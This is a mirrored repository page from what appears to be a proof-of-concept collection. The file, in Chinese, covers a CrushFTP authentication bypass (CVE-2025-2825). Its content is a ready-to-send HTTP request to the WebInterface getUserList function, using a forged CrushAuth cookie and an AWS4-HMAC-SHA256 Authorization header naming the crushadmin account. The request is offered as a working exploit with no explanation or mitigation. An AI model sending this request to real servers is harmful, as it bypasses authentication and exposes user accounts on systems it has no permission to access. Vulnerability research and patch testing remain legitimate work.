POC/CrushFTP身份验证绕过(CVE-2025-2825).md at ffd0472c02bc26b4adb15ef4e8b93991540b898a

admin/POC

Fork 0

mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00

Rainyseason 59289c32d6

Update CrushFTP身份验证绕过(CVE-2025-2825).md

2025-03-31 14:55:29 +08:00

373 B

Raw Blame History

CrushFTP身份验证绕过(CVE-2025-2825)

poc

GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
Host: target-server:8081
Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

373 B Raw Blame History

CrushFTP身份验证绕过(CVE-2025-2825)

poc

373 B

Raw Blame History